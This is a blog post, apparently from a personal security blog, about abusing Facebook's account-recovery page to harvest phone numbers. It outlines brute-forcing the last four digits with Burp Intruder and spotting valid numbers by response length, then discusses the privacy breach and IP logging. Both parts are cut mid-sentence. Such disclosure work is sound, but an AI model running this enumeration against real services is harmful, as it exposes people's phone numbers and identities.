Security for Fun and Profit !

As we discussed in the Last post that one can use his phone number to identify the account in case of forgetting password. Well this utility can be easily misused to harvest phone numbers. How ?? let me demonstrate: Attack Scenario: Step 1.  This Page URL:    https://www.facebook.com/login/identify?ctx=recover  asks for phone number in order to identify the user. Step 2. I captured the request in Burpsuite and then in to the intruder.  To perform the attack I Buteforced the numbers +91973914XXXX. The last 4 digits were bruteforced. +91 is country code for India. 9739 is the starting 4 digits for Vodafone numbers in Karnataka, India.  Ofcourse intruder makes it easy. As the result of the attack as screenshot shows there are 10000 attempts to be made. Step 3. Now have a close look to the content- length of the response. Content length like 7182 and 8044 are valid phone numbers. Content-length 6930 is for the attempts for which the phone numbe

If you want to identify your facebook account there are 3 ways you can Identify yourself: 1. Provide your e-mail ID. 2. Provide your Phone number (If you have given this in you profile). 3. Provide your user ID(your unique id assigned by the facebook). Screenshot below shows the page (https://www.facebook.com/login/identify?ctx=recover) to identify your account in case you want to recover. The other way to look into this is this can also be misused to validate someones phone number. Let say my phone number is 9739141XXX. I put it there and I see myself.So the phone number and profile relation can be seen successfully. But I have kept my privacy settings to most secure that "Only Friends"(shown in screenshot below) can look to my phone numbers. Isn't this is a privacy breach. But here is the catch.Facebook is smart and keeps the log of Public IPs you are coming from. If you have logged in from the same Public IP before this privacy se